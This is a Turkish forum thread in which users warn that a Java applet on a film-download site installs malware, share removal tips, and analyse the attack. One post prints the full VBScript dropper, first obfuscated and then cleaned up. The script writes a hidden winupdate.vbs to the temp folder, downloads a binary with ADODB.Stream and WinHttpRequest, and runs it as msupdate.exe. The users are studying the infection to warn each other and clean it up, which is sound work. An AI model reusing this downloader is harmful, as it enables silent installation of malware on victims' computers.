Hitfilmindir Javadown Uyarısı
-
yakında googledan engeli yer. yazık olur okadar emeğede.
-
SpoofU bunu yazdı:
-----------------------------
başlangıçta sms5.exe var mı bir bak.
-----------------------------
comfobix ve cleanerle taratıyorum bişe kalırmı acaba
SamSs diye bişe war bunumu diyon? -
kullanmadiginiz zamanlarda browser'dan javayi disable edebilirsiniz extra olaraktan.
firefox icin eklentiler bolumunden
ie icinse hizlandiricilar bolumunden..
-
hoca şimdi birkaç web sayfasına get gönderiyor, adodb yani database işlemleri yapıyor ve msuptade.exe diye bir dosya çalıştırıyor temp klasöründen, bunu yapmadan dosya izinleriylede oynuyor.
-
VBDream bunu yazdı:
-----------------------------
hoca şimdi birkaç web sayfasına get gönderiyor, adodb yani database işlemleri yapıyor ve msuptade.exe diye bir dosya çalıştırıyor temp klasöründen, bunu yapmadan dosya izinleriylede oynuyor.
-----------------------------
bunları o inen .exe kurulduktan sonramı yapıyor yoksa kurmadan mı bilgisyarda varken mi yapıyo -
tosun bunu yazdı:
-----------------------------
VBDream bunu yazdı:
-----------------------------
hoca şimdi birkaç web sayfasına get gönderiyor, adodb yani database işlemleri yapıyor ve msuptade.exe diye bir dosya çalıştırıyor temp klasöründen, bunu yapmadan dosya izinleriylede oynuyor.
-----------------------------
bunları o inen .exe kurulduktan sonramı yapıyor yoksa kurmadan mı bilgisyarda varken mi yapıyo
-----------------------------hocam şimdi şöyle ilk antiler kıllanmasın diye herhalde sonradan yazıyor dosyayı yani o winupdate.vbs şu komutu .vbs dosyasına ekle diyor ve sonra çalıştır diyor direk salt kod yok orda, sonra en son adım dosya izinlerini ayarladıktan sonra tempte ki msuptade.exe yi çalıştırıyor. Muhtemelen çalıştırdı ve virüs kendini kimbilir nereye kopyaladı ve msupdate i sildi.
-
ya sizde nasıl çalıştı beyler :D bende hiçbişey yok java bile çalışmaya başlamıyo. vbs uyarısı vs gelmiyo :S sizin java sürümü ne
-
kodun saf hali:
--------------------------------------------------
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winupdate.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winupdate.vbs & echo Dim abc >> %temp%\winupdate.vbs & echo Dim xyz >> %temp%\winupdate.vbs & echo Dim rofl >> %temp%\winupdate.vbs & echo abc = ""ADODB"" >> %temp%\winupdate.vbs & echo xyz = "".Stream"" >> %temp%\winupdate.vbs & echo Set rofl = CreateObject(abc+xyz) >> %temp%\winupdate.vbs & echo rofl.Type = adTypeBinary >> %temp%\winupdate.vbs & echo rofl.Open >> %temp%\winupdate.vbs & echo rofl.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winupdate.vbs & echo rofl.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winupdate.vbs & echo Function BinaryGetURL(URL) >> %temp%\winupdate.vbs & echo Dim lol >> %temp%\winupdate.vbs & echo Set lol = CreateObject(""WinHttp.WinHttpRequest.5.1"") >> %temp%\winupdate.vbs & echo lol.Open ""GET"", URL, False >> %temp%\winupdate.vbs & echo lol.Send >> %temp%\winupdate.vbs & echo BinaryGetURL = lol.ResponseBody >> %temp%\winupdate.vbs & echo End Function >> %temp%\winupdate.vbs & echo Set blub = CreateObject(""WScript.Shell"") >> %temp%\winupdate.vbs & echo blub.Run ""%temp%\msupdate.exe"" >> %temp%\winupdate.vbs & start %temp%\winupdate.vbs %temp%\msupdate.exe", 0,False--------------------------------------------------
ayıkladığım hali:
--------------------------------------------------
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim abc
Dim xyz
Dim rofl
abc = ""ADODB""
xyz = "".Stream""
Set rofl = CreateObject(abc+xyz) rofl.Type = adTypeBinary
rofl.Open
rofl.Write BinaryGetURL(Wscript.Arguments(0))
rofl.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite
Function BinaryGetURL(URL)
Dim lol
Set lol = CreateObject(""WinHttp.WinHttpRequest.5.1"")
lol.Open ""GET"", URL, False
lol.Send BinaryGetURL = lol.ResponseBody
End Function
Set blub = CreateObject(""WScript.Shell"")
blub.Run ""%temp%\msupdate.exe"" %temp%\winupdate.vbs & start %temp%\winupdate.vbs %temp%\msupdate.exe", 0,False
----------------------------------------------------------------------------------------------------------------
-
Beyler biri yardım etsede silsek şunu ? kim yardım eder ki bana